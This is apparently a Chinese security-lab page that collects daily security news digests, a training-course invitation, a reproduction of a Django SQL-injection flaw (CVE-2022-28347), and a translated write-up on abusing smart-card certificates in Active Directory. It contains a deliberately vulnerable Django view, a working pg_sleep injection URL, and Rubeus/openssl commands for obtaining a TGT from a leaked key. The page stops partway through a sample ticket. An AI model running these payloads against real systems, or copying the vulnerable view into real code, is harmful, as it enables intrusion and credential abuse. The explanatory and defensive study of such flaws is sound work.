网络安全日报 2023年05月19日
1、MalasLocker勒索软件入侵Zimbra服务器窃取邮件和加密文件
https://www.bleepingcomputer.com/news/security/malaslocker-ransomware-targets-zimbra-servers-demands-charity-donation/ 一种新的勒索软件操作是入侵Zimbra服务器以窃取电子邮件和加密文件。然而,威胁行为者并没有要求支付赎金,而是声称要求向慈善机构捐款以提供加密器并防止数据泄露。被BleepingComputer称为MalasLocker的勒索软件行动于2023年3月底开始对Zimbra服务器进行加密,受害者在BleepingComputer和Zimbra论坛上都报告说他们的
2、ScanSource遭受勒索软件攻击导致部分系统中断
https://www.bleepingcomputer.com/news/security/scansource-says-ransomware-attack-behind-multi-day-outages/ 技术提供商ScanSource宣布已成为勒索软件攻击的受害者,影响了其部分系统、业务运营和客户门户。ScanSource是一家位于美国的云服务和SaaS连接和网络通信提供商,还提供特殊的PoS(销售点)和支付、安全和AIDC(自动识别和数据捕获)解决方案。从5月15日左右开始,ScanSource客户联系研究人员称他们无法再访问该公司的客户门户网站和网站,担心他们遭受了网络攻击。S
3、微软更新Microsoft Defender修复LSA保护漏洞
https://www.bleepingcomputer.com/news/microsoft/microsoft-pulls-defender-update-fixing-windows-lsa-protection-bug/ 微软已经推出了最近的Microsoft Defender更新,该更新本应修复一个已知问题,该问题会触发持续重启警报和Windows安全警告,即本地安全机构(LSA)保护已关闭。LSA Protection通过阻止LSASS进程内存转储和将不受信任的代码注入LSASS.exe进程来帮助保护Windows用户免受凭据盗窃企图,否则将允许提取敏感信息。微软在3月21日承认
4、思科警告客户注意多个小型企业交换机存在的高危漏洞
https://www.bleepingcomputer.com/news/security/cisco-warns-of-critical-switch-bugs-with-public-exploit-code/ 思科今天警告客户注意四个严重的远程代码执行漏洞,其中公开的漏洞利用代码影响多个小型企业系列交换机。所有四个安全漏洞都获得了几乎最高的严重性评级,CVSS基本分数为9.8/10。成功的利用允许未经身份验证的攻击者在受感染的设备上以root权限执行任意代码。这些漏洞(跟踪为CVE-2023-20159、CVE-2023-20160、CVE-2023-20161和CVE-2023-2
5、谷歌发布了 Chrome 113 更新以修补 12 个漏洞,含1个严重漏洞
https://www.securityweek.com/chrome-113-security-update-patches-critical-vulnerability/ 谷歌发布了 Chrome 113 更新以修补 12 个漏洞,其中包括一个严重的UAF漏洞。
6、全球分布的数百万部智能手机被预装了“Guerrilla”恶意软件
https://thehackernews.com/2023/05/this-cybercrime-syndicate-pre-infected.html 自 2021 年以来,趋势科技一直在追踪一项似乎与 Triada 有关的不同行动。该活动背后的组织被网络安全公司追踪为 Lemon Group,预装在设备上的恶意软件称为 Guerrilla。 由于设备上预装了恶意软件,威胁行为者已经控制了分布在全球的数百万部智能手机。
7、Apple 修复了三个新的被攻击者利用的零日漏洞
https://securityaffairs.com/146411/security/apple-3-new-zero-day-bugs.html Apple 发布了安全更新,以解决 iPhone、Mac 和 iPad 中被攻击者利用的三个零日漏洞。
8、乌克兰、爱尔兰、日本和冰岛加入北约合作网络防御卓越中心
https://securityaffairs.com/146372/cyber-warfare-2/nato-ccdcoe.html 北约合作网络防御卓越中心 (CCDCOE) 宣布乌克兰、爱尔兰、日本和冰岛加入该组织。
9、8220团伙利用Oracle WebLogic漏洞劫持服务器挖矿
https://thehackernews.com/2023/05/8220-gang-exploiting-oracle-weblogic.html 臭名昭著的恶意挖矿组织8220 Gang被发现利用 Oracle WebLogic 服务器中存在六年之久的安全漏洞作为武器,将易受攻击的实例诱捕到僵尸网络中并分发加密货币挖掘恶意软件。
10、响尾蛇 APT 组织持续攻击我国和巴基斯坦实体组织
https://www.freebuf.com/news/366828.html 网络安全研究人员近期发现 APT 组织 SideWinder 正在“集中火力”猛攻位于我国和巴基斯坦境内的实体组织。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
Django SQL注入漏洞复现 (CVE-2022-28347)
漏洞简介
在Django 2.2 的 2.2.28 之前版本、3.2 的 3.2.13 之前版本和 4.0 的 4.0.4 之前版本中的 QuerySet.deexplain() 中发现了SQL注入问题。这是通过传递一个精心编制的字典(带有字典扩展)作为**options参数来实现的,并将注入负载放置在选项名称中。
影响版本
2.2 =< Django < 2.2.28
3.2 =< Django < 3.2.13
4.0 =< Django < 4.0.4
环境搭建
创建存在 漏洞 Django 版本 3.2.12 项目
创建 startapp Demo 并依次修改文件
安装 postgresql 数据库
settings.py 设置连接数据库为 postgresql 数据库
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'test',
'USER': 'postgres',
'PASSWORD': '123456',
'HOST': '127.0.0.1',
'PORT': '5432',
}
}
urls.py 设定对应路由
from django.contrib import admin
from django.urls import path
from Demo import views
urlpatterns = [
path('admin/', admin.site.urls),
path('index/', views.index),
path('demo/', views.users),
path('initialize/', views.loadexampledata),
]
models.py
from django.db import models
# Create your models here.
class User(models.Model):
name = models.CharField(max_length=200)
def __str__(self):
return self.name
views.py
import json
from django.http import HttpResponse
from django.shortcuts import render
# Create your views here.
from .models import User
def index(request):
return HttpResponse('hello world')
def users(request):
query = request.GET.get('q')
query = json.loads(query)
qs = User.objects.get_queryset().explain(**query)
return HttpResponse(qs)
def loadexampledata(request):
u = User(name="Admin")
u.save()
u = User(name="Staff1")
u.save()
u = User(name="Staff12")
u.save()
return HttpResponse("ok")
漏洞复现
http://127.0.0.1:8000/demo/?q={"ANALYZE)+select+pg_sleep(5);--+":"aaa"}
发现成功构造使得服务器沉睡
漏洞分析
在进行代码分析之前,我们先了解一个知识点 EXPLAIN
EXPLAIN
EXPLAIN -- 显示一个语句的执行计划
EXPLAIN [ ( option [, ...] ) ] statement
EXPLAIN [ ANALYZE ] [ VERBOSE ] statement
option:
ANALYZE [ boolean ] 执行命令并显示实际运行时间
VERBOSE [ boolean ] 显示规划树完整的内部表现形式,而不仅是一个摘要
COSTS [ boolean ]
BUFFERS [ boolean ]
TIMING [ boolean ]
FORMAT { TEXT | XML | JSON | YAML }
statement:
查询执行计划的 SQL 语句,可以是任何 select、insert、update、delete、values、execute、declare 语句
EXPLAIN ANALYZE不仅会显示查询计划,还会实际运行语句。EXPLAIN ANALYZE会丢掉任何来自SELECT语句的输出,但是该语句中的其他操作会被执行(例如INSERT、UPDATE或者DELETE)。
调试分析
django.db.models.query.QuerySet.explain
django.db.models.sql.query.Query.explain
django.db.models.sql.compiler.SQLCompiler.explain_query
django.db.models.sql.compiler.SQLCompiler.execute_sql
django.db.models.sql.compiler.SQLCompiler.as_sql
在这里会根据所选择的数据库,来调用其相对应的 explain_query_prefix 方法
django.db.backends.postgresql.operations.DatabaseOperations.explain_query_prefix
postgresql 中 重写了 explain_query_prefix 方法将键名拼接到了 SQL 语句中
最后执行的 SQL 语句是
'EXPLAIN (ANALYZE) SELECT PG_SLEEP(5);-- true) SELECT "Demo_user"."id", "Demo_user"."name" FROM "Demo_user"'
漏洞修复
https://github.com/django/django/commit/00b0fc50e1738c7174c495464a5ef069408a4402#diff-fbd8a517f5fa1333b9f7273bcd007551cd2fb4b8f6732cd6002ba42411802901做了一个过滤,发现危险字符就抛出异常
只有字符串在白名单内才会拼接到语句中
网络安全日报 2023年05月18日
1、美国悬赏1000万美元抓捕一名俄罗斯勒索软件开发者
https://thehackernews.com/2023/05/us-offers-10-million-bounty-for-capture.html 美国司法部(DoJ)指控和起诉一名俄罗斯国民,称他对该国和世界各地的“数千名受害者”发动勒索软件攻击。Mikhail Pavlovich Matveev(又名Wazawaka、m1x、Boriselcin和Uhodiransomwar),这名30岁的嫌疑人,据称是LockBit、Babuk和Hive勒索软件变种的开发和部署的“核心人物”。LockBit、Babuk 和Hive的运作方式相似,利用非法获得的访问权限来窃取有价值的数据并在受
2、研究人员警告新的ZIP域名可能会被用于网络攻击
https://www.bleepingcomputer.com/news/security/new-zip-domains-spark-debate-among-cybersecurity-experts/ 网络安全研究人员和IT管理员对谷歌新的ZIP和MOV互联网域提出了担忧,警告称威胁行为者可能会利用它们进行网络钓鱼攻击和恶意软件传播。本月早些时候,谷歌推出了 八个新的顶级域(TLD),可以购买这些域来托管网站或电子邮件地址。虽然ZIP和MOV和TLD自2014年以来一直可用,但直到本月它们才普遍可用,允许任何人为网站购买域,如bleepingcomputer.zip。但是,这些域可能
3、下载量达到500万次的家长控制应用程序存在多个漏洞
https://www.bleepingcomputer.com/news/security/parental-control-app-with-5-million-downloads-vulnerable-to-attacks/ 适用于Android的Kiddowares“家长控制 - Kids Place”应用程序受到多个漏洞的影响,这些漏洞可能使攻击者能够在受保护的设备上上传任意文件、窃取用户凭据,并允许孩子在父母不注意的情况下绕过限制。Kids Place应用程序是一款家长控制套件,在Google Play上有500万次下载,提供监控和地理定位功能、互联网访问和购买限制、屏幕时间管理
4、CopperStealer恶意软件开始使用新的Rootkit和网络钓鱼工具包模块
https://thehackernews.com/2023/05/water-orthrus-copperstealer-malware.html CopperStealer恶意软件背后的威胁行为者在2023年3月和2023年4月发起了两次新的活动,旨在提供两种名为CopperStealth和CopperPhish的新型有效载荷。趋势科技正在追踪名为Water Orthrus的具有经济动机的团体。该对手还被评估为另一个名为Scranos的活动的幕后黑手,Bitdefender在2019年详细介绍了该活动。Water Orthrus至少从2021年开始活跃,它有利用按安装付费(PPI)网络重
5、大学录取平台Leverage EDU暴露了学生的敏感数据和个人身份信息
https://securityaffairs.com/146329/data-breach/university-admission-platform-leverage-edu-exposed-student-passports.html 热门大学录取平台Leverage EDU泄露了近240000个敏感文件,包括学生的护照、财务文件、证书和考试成绩。Cybernews研究团队发现,由于系统配置错误,Leverage EDU 泄露了极其敏感的数据。由于不需要身份验证,任何人都可以访问申请大学所需的所有学生个人信息。Leverage EDU作为寻求出国留学的学生的一站式录取平台,它声称在
6、Teltonika 工业路由器中的多个漏洞使OT网络易受黑客攻击
https://securityaffairs.com/146317/hacking/teltonika-industrial-cellular-routers-flaws.html 研究人员在 Teltonika 工业蜂窝路由器中发现了多个漏洞,这些漏洞可能会使 OT 网络遭受网络攻击。
7、2022年苹果因隐私和安全问题封杀近170万个应用程序
https://www.freebuf.com/news/366734.html 苹果公司的App Store团队在2022年阻止了超过20亿美元的欺诈交易,并因违反隐私、安全和内容政策而阻止了近170万个应用程序提交。
8、2023年就业蓝皮书:“信息安全”薪资连续9年居榜首
https://baijiahao.baidu.com/s?id=1765931255784348840&wfr=spider&for=pc&& 相关研究数据显示,2022届本科毕业生10大高薪专业,几乎都被与IT紧密相关的计算机类、电子信息类专业占领。最近几年火爆的“数据科学与大数据技术”专业,首次上榜,就位居第3名。
9、VirusTotal AI代码分析扩展支持Windows、Linux
https://www.bleepingcomputer.com/news/security/virustotal-ai-code-analysis-expands-windows-linux-script-support/ 谷歌为 VirusTotal Code Insight 添加了对更多脚本语言的支持,VirusTotal Code Insight 是最近推出的基于人工智能的代码分析功能。
10、WhatsApp 推出“聊天锁定”功能
https://www.bleepingcomputer.com/news/security/whatsapp-now-lets-you-lock-chats-with-a-password-or-fingerprint/ WhatsApp 现在正在推出“聊天锁定”,这是一项新的隐私功能,允许用户阻止其他人访问他们最私人的对话。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
2023年网络安全高级研修班 · 邀请函
为深入学习贯彻习近平总书记关于网络强国的战略思想,落实“十四五”规划和2035年远景目标纲要对网络安全工作的重要部署,把握当前国际国内、教育系统网络安全工作面临的新形势,加强网络安全宣传教育和人才培养,赋能学校打造经验丰富的网安教学师资队伍,全面提升网络安全技能的实战教学水平。针对网安学科竞赛、网安实战实训等网安教学热点需求,由湖南蚁景科技有限公司主办,广州大学网络空间安全学院协办,共同推出此次“2023年网络安全高级研修班”。
一、组织单位
主办单位:湖南蚁景科技有限公司
协办单位:广州大学网络空间安全学院
二、培训内容
1、网安专业人才培训模式
讲解方班特色化网安专业建设和实践创新型网安人才培养模式。
2、软件逆向分析技术与应用
逆向分析相关基础知识、一般方法、常规技术和工具应用等,包括逆向工程概述、x86架构、常见算法识别、对抗保护与混淆、多种语言逆向分析,以及IDA、x64dbg等常用工具使用等。
3、网安学科竞赛实战演练
知名网安学科竞赛中的逆向分析全视角演示和经典赛题实战讲解,带队经验分享和研讨。
三、培训对象
全国高校、职业院校计算机相关专业(信息安全、计算机科学与技术、网络安全、信息科学与工程、软件工程、网络工程等)专业负责人、学科带头人、专业骨干教师、实验室人员等。
四、预期收获
1、系统了解网安学科竞赛新发展及战队训练方法,与知名国际战队讲师面对面互动交流。
2、掌握软件逆向基础知识、常用方法和技术,熟悉常用工具运用方法。
3、亲历网安学科竞赛逆向分析真题演练。
4、与“方班”交流互动,了解特色网安专业建设和人才培养工作。
5、获得由蚁景科技和广州大学网络空间安全学院联合颁发的结业证书。
五、主题讲师
1. 特色网安专业建设及网安人才培养模式
王乐,方滨兴院士实验班教研室主任,中国网络空间安全人才教育论坛常务副秘书长、创新与思辨工作委员会秘书长,广州大学“百人计划”引进人才,广州大学网络空间安全学院副院长,广州大学网络空间安全中央实验室主任。
2. 软件逆向分析技术、应用与实战
in1t,国际知名网安战队Reverse方向核心成员,擅长软件安全、移动安全、二进制攻防,长期从事安全服务相关工作,具有多年逆向实战和实战培训经验,多次参与国内/国际知名网安赛事命题,进入2022 DEFCON 总决赛,获2020年国赛特等奖、2021年强网杯一等奖、2022-ISCC个人赛双赛道一等奖等。
六、培训安排
1、培训方式:线下现场
2、培训时间:2023年7月31日-8月4日(7月30日报道)
3、培训地点:广州市黄埔区知识城海丝知识中心B3栋609号教学实训室
4、会议规模:100人
七、报名方式
1、报名时间:即日起至2023年7月30日
2、报名邮箱:EDU@antvsion.com
3、电话咨询:宋老师 13657413038
4、培训费用:3680元/人(含培训资料,用于专业讲师课酬、主办企业业务费用,协办学校不收取费用;路费和食宿费用自理,自备电脑)
5、付款方式:
◆ 线上汇款: (请务必在备注栏里注明“学校名+参会者姓名”)
公司名称:湖南蚁景科技有限公司
开户行名称:北京银行长沙麓谷支行
开户行账号:2000 0044 8649 0003 6286 388
◆ 现场缴费:现金、扫码或刷卡(银行卡、公务卡均可)
具体课程内容
扫描下方二维码即可报名:
网络安全日报 2023年05月17日
1、CheckMate勒索软件以流行的文件共享协议为目标发动攻击
https://cybernews.com/security/checkmate-ransomware-victims/ CheckMate勒索软件运营商一直以用于文件共享的服务器消息块(SMB)通信协议为目标,以危害受害者的网络。与大多数勒索活动不同,CheckMate于2022年被发现,在其整个活动过程中一直保持沉默。据研究人员所知,它不运营数据泄露站点。这对于勒索软件活动来说是非常不寻常的,因为许多知名团伙吹嘘目标并将他们作为受害者发布在他们的数据泄露网站上。他们这样做是为了增加受害者支付赎金的压力。在获得对SMB共享的访问权限后,威胁行为者会加密所有文件并留下勒索票据,要求支付赎金以
2、人工智能ChatGPT 的负责人在国会作证,呼吁政府监管人工智能
https://www.securityweek.com/chatgpts-chief-testifies-before-congress-calls-for-new-agency-to-regulate-artificial-intelligence/ 开发 ChatGPT 的 OpenAI 负责人告诉国会,政府干预“对于减轻日益强大的”人工智能系统的风险至关重要。
3、Teltonika 漏洞可能使数以千计的工业组织遭受远程攻击
https://www.securityweek.com/teltonika-vulnerabilities-could-expose-thousands-of-industrial-orgs-to-remote-attacks/ 工业网络安全公司 Otorio 和 Claroty 的研究人员联手对 Teltonika 制造的产品进行了详细分析,发现了潜在的严重漏洞,这些漏洞可能会使许多组织面临远程黑客攻击。
4、CISA:多个旧的 Linux 漏洞在攻击中被利用
https://www.securityweek.com/cisa-several-old-linux-vulnerabilities-exploited-in-attacks/ 美国网络安全和基础设施安全局 (CISA) 已将多个 Linux 和 Linux 相关缺陷添加到其已知的已利用漏洞 (KEV) 目录中。该机构周五在其 KEV 目录中添加了七个新漏洞:Ruckus AP 远程代码执行 (CVE-2023-25717)、Red Hat Polkit 权限提升 (CVE-2021-3560)、Linux 内核权限提升 (CVE-2014-0196和CVE-2010-3904)、Jenk
5、PharMerica 披露遭勒索攻击影响 580 万人的数据泄露
https://www.securityweek.com/pharmerica-discloses-data-breach-impacting-5-8-million-individuals/ 美国国家医药网络公司PharMerica披露一起数据泄露事件,暴露了581.5万人的个人信息。据悉,该公司是医药机构服务市场的第二大公司,为老年生活社区、护理机构、公共卫生组织和急性后护理组织提供服务。
6、新 RA Group 勒索软件团伙使用泄露的 Babuk勒索软件源码
https://securityaffairs.com/146248/cyber-crime/new-ra-group.html 思科 Talos 研究人员最近发现了一个名为 RA Group 的新勒索软件行动,该行动至少从 2023 年 4 月 22 日开始活跃。该组织已经入侵了美国的三个组织和韩国的一个组织。该组织正在使用泄露的Babuk 勒索软件源代码。
7、美国政府正在修订关基安全保护顶层政策
https://www.secrss.com/articles/54618 为了保护关键基础设施,拜登政府正在修改一份十年前的总统令,官员和专家表示,面对不断变化的网络世界,这条 2013 年发布的总统令亟需修改。
8、微软将用一年时间完成对一个 0day 漏洞的修补
https://www.solidot.org/story?sid=74957 微软近日释出了补丁,修复了一个被 BlackLotus bootkit 利用的 Secure Boot 绕过漏洞。微软在今年 1 月释出补丁修复了编号为 CVE-2022-21894 的漏洞,但该补丁并不完整,攻击者很快找到了绕过方法。
9、黑客声称出售美国关键基础设施制造商的机密数据
https://www.anquanke.com/post/id/288752 黑客组织在某论坛上公开列出了一个据称属于美国关键基础设施制造商 Sanmina Corporation 的待售数据集。其中包括大约 50000 名公司员工的全名、电子邮件、电话号码、职位和其他私人数据。
10、新“MichaelKors”勒索软件即服务针对 Linux 和 VMware ESXi
https://thehackernews.com/2023/05/new-michaelkors-ransomware-as-service.html 截至 2023 年 4 月,一种名为 MichaelKors 的新勒索软件即服务(RaaS)操作已成为针对 Linux 和VMware ESXi 系统的最新文件加密恶意软件。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年05月16日
1、CheckMate勒索软件以流行的文件共享协议为目标发动攻击
https://cybernews.com/security/checkmate-ransomware-victims/ CheckMate勒索软件运营商一直以用于文件共享的服务器消息块(SMB)通信协议为目标,以危害受害者的网络。与大多数勒索活动不同,CheckMate于2022年被发现,在其整个活动过程中一直保持沉默。据研究人员所知,它不运营数据泄露站点。这对于勒索软件活动来说是非常不寻常的,因为许多知名团伙吹嘘目标并将他们作为受害者发布在他们的数据泄露网站上。他们这样做是为了增加受害者支付赎金的压力。在获得对SMB共享的访问权限后,威胁行为者会加密所有文件并留下勒索票据,要求支付赎金以
2、 XWorm恶意软件利用Follina漏洞发起新一轮攻击
https://thehackernews.com/2023/05/xworm-malware-exploits-follina.html 网络安全研究人员发现了一项正在进行的网络钓鱼活动,该活动利用独特的攻击链在目标系统上传播XWorm恶意软件。研究人员揭示了威胁行为者以预订为主题的诱饵,以欺骗受害者打开能够传递XWorm和Agent Tesla有效载荷的恶意文档。这些攻击从网络钓鱼攻击开始,以分发诱饵Microsoft Word文档,并不是使用宏,而是利用Follina漏洞(CVE-2022-30190,CVSS评分:7.8)来投放混淆的PowerShell脚本。威胁行为者利用Power
3、攻击者可利用Netgear路由器漏洞发动远程攻击
https://thehackernews.com/2023/05/netgear-routers-flaws-expose-users-to.html Netgear RAX30路由器中披露了多达五个安全漏洞,这些漏洞可以通过链接绕过身份验证并实现远程代码执行。Claroty安全研究员Uri Katz在一份报告中说:“成功的攻击可能允许攻击者监控用户的互联网活动、劫持互联网连接并将流量重定向到恶意网站或将恶意软件注入网络流量。”此外,与网络相邻的威胁行为者还可以利用漏洞来访问和控制网络智能设备,如安全摄像头、恒温器、智能锁;篡改路由器设置,甚至使用受感染的网络对其他设备或网络发起攻击。
4、Uintah Basin Healthcare泄露十万多名患者的数据
https://www.govinfosecurity.com/uintah-basin-healthcare-data-breach-affects-over-100000-a-22066 犹他州的一家农村医疗保健提供者向十万多人通报了一起黑客事件,该事件涉及接受治疗长达十年之久的个人的健康信息。Uintah Basin Healthcare周三开始通知患者,它在11月检测到其网络上存在“异常活动”。因此,黑客可能访问或窃取了2012年3月至去年11月期间接受治疗的103974名患者的患者数据。医疗保健中心女发言人Maigen Zobell告诉信息安全媒体集团,“没有证据表明滥用或企图滥用
5、爱荷华大学医院和诊所因向Facebook非法披露PHI而被起诉
https://www.hipaajournal.com/university-of-iowa-hospitals-and-clinics-sued-unlawful-disclosure-phi-facebook/ 美国爱荷华州南区地方法院已提起诉讼,指控爱荷华大学医院和诊所(UIHC)在未征得患者同意的情况下,非法、疏忽和鲁莽地向Facebook披露患者的私人信息。最近发表在《卫生事务》上的一项研究发现,美国98.6%的非联邦急救医院网站在其网站上都有跟踪像素,这些像素收集敏感数据并将其传输给Meta(Facebook)、谷歌和其他第三方,传输的信息可用于多种目的。使用这些代码片段会导致
6、美国交通部遭入侵,23.7万政府人员数据遭泄露
https://www.freebuf.com/news/366467.html 知情人士周五表示,美国交通部(USDOT)发生了一起数据泄露事件,暴露了23.7万名现任和前任联邦政府人员的个人信息。该事件攻击了用于处理TRANServe交通福利的系统,这些福利津贴用于发放政府人员的一些通勤费用。目前尚不清楚这些个人信息是否被用于犯罪目的。
7、恶意机器人现在占所有互联网流量的 30%
https://www.infosecurity-magazine.com/news/bad-bots-now-comprise-30-of-all/ 2022年以来,来自恶意软件的互联网流量增加了 5.2021%,达到 30% 以上——这是自 Imperva 于 2013 年发布第一份恶意机器人报告以来的最高数字。
8、西班牙警方取缔大规模网络犯罪团伙,40人被捕
https://thehackernews.com/2023/05/spanish-police-takes-down-massive.html 西班牙国家警察表示,它逮捕了40人,因为他们涉嫌参与一个名为Trinitarians的有组织犯罪团伙。
9、WhatsApp上未知国际号码的视频通话诈骗,在印度兴起
https://thecyberexpress.com/unknown-international-calls-whatsapp-scams/ 接听来自未知国际号码的WhatsApp电话...这就是一个来自孟买的30岁男子损失30万卢比所需要的一切。这就是诈骗者在最新的WhatsApp性勒索骗局中勒索钱财的容易程度,针对的是印度毫无戒心的WhatsApp用户。
10、孟加拉国神秘团队声称对埃塞俄比亚卫生部的网络攻击负责
https://thecyberexpress.com/ethiopian-ministry-of-health-cyber-attack/ 黑客组织孟加拉国神秘团队对埃塞俄比亚卫生部的网络攻击负责。该网站在我们初步调查期间无法访问,现已上线。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
针对基于智能卡进行认证的活动目录攻击
最近,我参与了一项攻击基于智能卡的活动目录的工作。实际上,你根本不需要使用物理智能卡来验证登录这个活动目录。证书的属性决定了它是否可以用于基于智能卡进行登录。因此,如果你能获得相应的私钥,那么就可以绕过智能卡的验证实现登录。
当用户被设置为基于智能卡进行登录时,在它的默认配置中,域控制器将接受任何由它所信任的证书授权机构签署的、符合以下规范的证书:
● CRL的分配点不可为空、并且可用
● 证书的密钥要使用数字签名
● 增强型的密钥使用:
- 智能卡登录
- 客户端认证(可选,用于基于SSL的认证)
● 包含用户UPN的主题替代名称
此外,如果启用了允许使用无扩展密钥的证书属性组策略,那么就没必要使用增强型的密钥。因为这可能会导致发给域用户或计算机的其他类型的证书。
下面是我们的具体的研究过程。
PKINIT
正如我们所知的,域内的活动目录会使用Kerberos协议来验证域名。攻击者可以使用像Rubeus、Mimikatz、Kekeo和impacket这样的工具来针对域环境进行利用。
那么,基于 PKI 的认证与 Kerberos 的认证有什么关系呢?早在 2006 年,微软和航空航天公司联合提交了 RFC 4556。这协议引入了对 Kerberos 预认证的公钥密码学的支持。
预认证方法可以防止Kerberos对账户密码进行离线暴力攻击。如果没有在AD账户上启用预认证,那么用户就容易受到AS-REP的攻击。随着预认证的引入,那么最初的AS-REQ Kerberos请求就会包含一个加密的时间戳。并且这个用来加密的密钥来自于用户的密码。这向 KDC 证明了请求登录的用户确实知道账户密码。因此,KDC就会返回一个与用户密码相关的加密的AS-REP(对AS-REQ的响应)。预认证数据包含的一个时间戳也可以防止重放攻击。如果预认证数据无效,KDC会返回一个错误,而且也不允许对AS-REP响应密钥进行暴力破解。如果一个攻击者能够在一个网络中抓取 Kerberos的响应数据包,那
基于 PKI 的认证同样也是以类似的方式进行工作。它首先会使用 Kerberos 预认证来证明用户是他们所说的那个人。同样,它也会使用一个时间戳,但不是使用用户的密码生成的密钥对信息进行加密,而是用属于证书的私钥以PKCS #7加密信息语法(CMS)的形式来签署信息。该私钥可以存储于物理智能卡上,并且也可以以其他的形式进行存储,这其中也包括不那么安全的方法。一旦KDC验证了CMS有效载荷的签名,并且一切正常,那么AS-REP就会返回给客户。PKINIT也会对AS-REP响应进行加密。因为在基于PKI的Kerberos登录过程中并没有使用密码,所以用户密钥对客户来说是未知的。为了解决这个问题,A
从这里开始,其他的一切还都保持不变。客户端将会获得一个有效的TGT,可用于申请TGS票据。并且该证书在TGT的有效期内就不再使用,在再次需要该证书的私钥之前,一般会保持7天的有效期。当然,这并不是说在Windows登录期间,私钥在7天内不会被使用。如果机器被锁定或用户已经被注销,那么Windows会像基于密码的登录那样强制进行认证。但从攻击者的角度来看,如果他们已经获得了TGT,这其实就已经不重要了。
所以这里我开始尝试在Rubeus中添加对PKINIT的支持,并创建了一个请求。
基于PKCS#12的认证(PFX)
这里我们讨论的第一个攻击场景是用户私钥泄露问题。我们可以使用一个PKCS#12证书库,我们可以使用一个用户的证书以及相应的私钥来生成一个Kerberos TGT。一旦你有了私钥blob和相应的证书,那么你就可以使用OpenSSL来生成PKCS12存储,如下所示:
openssl pkcs12 -export -out leaked.pfx -inkey privateKey.key -in certificate.crt
一旦你生成了一个有效的证书存储,那么我们就可以使用Rubeus中新增加的内容来请求TGT了。如果你决定用密码来保护证书库,那么你可以在命令行中加入/password选项。
Rubeus.exe asktgt /user:Administrator /certificate:leaked.pfx /domain:hacklab.local /dc:dc.hacklab.local
然后,Rubeus将生成一个基于PKINIT的AS-REQ,使用我们所提供的证书库来验证用户。如果一切顺利,KDC就会返回数据包,那么你就应该会得到类似的输出:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=hacklab, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'hacklab.local\Administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGAjCCBf6gAwIBBaEDAgEWooIFDzCCBQthggUHMIIFA6ADAgEFoQ8bDUhBQ0tMQUIuTE9DQUyiIjAg
oAMCAQKhGTAXGwZrcmJ0Z3QbDWhhY2tsYWIubG9jYWyjggTFMIIEwaADAgESoQMCAQKiggSzBIIEr8LN
J2NAHpBehZLNJzDYkuu9bc++eVxENl8EaLXhUi8zlChPsqrcNGpH9gruGwRefjnTUY4k+1WiBxMzt8dy
XIAOVxUDhGUf/5S9V6zo/LDMN7Dhau7/W9APmSaHq1ml5fAGI+hh7v7AQdQYdIMncB8E9xY2fSX395Zm
NalyS8hhZlmV0Gz3xrP/zu6m0eiqDvJpURGvvSGGXpQNqh1thwdzXur2q/F1lcnVgRQe6AiTqBBpcDx/
4kw39tvyo7x3W1kEs3NIMT/cB8G1uMEV0EK5jy6dJIFeuVnSC3D6/qjsrP94iIpMg3X5zj3pCeGegPjB
7uqkZx9DPcxm/G8aaQIVPjyxPsCK7D5HAbdSyJQIhAAbBVSplA9homs5TyP0dRs/8F/MSU38dUufTE+M
QvdJmzN/+5yaYK8iDGIVMLKyBhgw/ouMoINqQo77Z2+ENvsU6VqzMEg/72LShY9IJB5vbHWzlOv4dPyc
a23xBQPgHlKF3xxsUNp4wXeEBnCU74cxgb/AQzFvktjJM1CT08n4rC8bCW8jxTDKdrgWr8QzczHWMy0q
13ddnOQfXU9ju02LdEfcW8hYzY500+NCRRtckaGNc2j1b5tOINhQnzAt1b1Gry69wbS/+Sgr9DrW92lu
X0P5ldC+RfgXjunlskUbXHhT9KzIvekhXDd3JzWM+BfEdGiFJGk/NqLrAlwlCLu8Z155uOHpYWJI981L
P091reVDXF4+XNaWXLnkpwSq+fGZmfrLzjbaNNLygeAB1O7K/i/yAkH7/sJa63riqPuvSdVOS1krlYpq
qChRH+0pzXhIVMdLeGULCGCIfzbcwoCtWogvvVDjfdGipEae/llXqUFVxiTiafVul/YcIWcQFf34fMJu
l5v/D++KdfYsV03gYQX7DehWVyf5/tpUJGJCl4cEr2K8wa5235YVthZ0FLom4VobFJVpclAOVkMHv6jp
9kIKbOMcjYQ7BKTokCL3MMrOq2L++knISUZuVH/UHevSQVYL85svd5Z10jX8hHUZRRCYD0UBlRYLZ+BM
U0uf+i6dOE3fcmPKePmZgEx1UMufOk4ytsGWt7ypiIYVhNbLgkK1u8AhgeLaY2x3Xf1BYfw8DPtO/woG
d/NvZmJQcy17QqAoTL+cjJDueV/FBRkDTQMm2LCTpIDIsjjRFd5et8ncuwYFVc6vNxAtCped7DPtzDjg
NS4NfL6jC9T/HXyih0V/eyPYpbOw4PYl21XI9RZgmYfi+JHj4ne6l0weFjc0V880p+sHcScDa72qHGSY
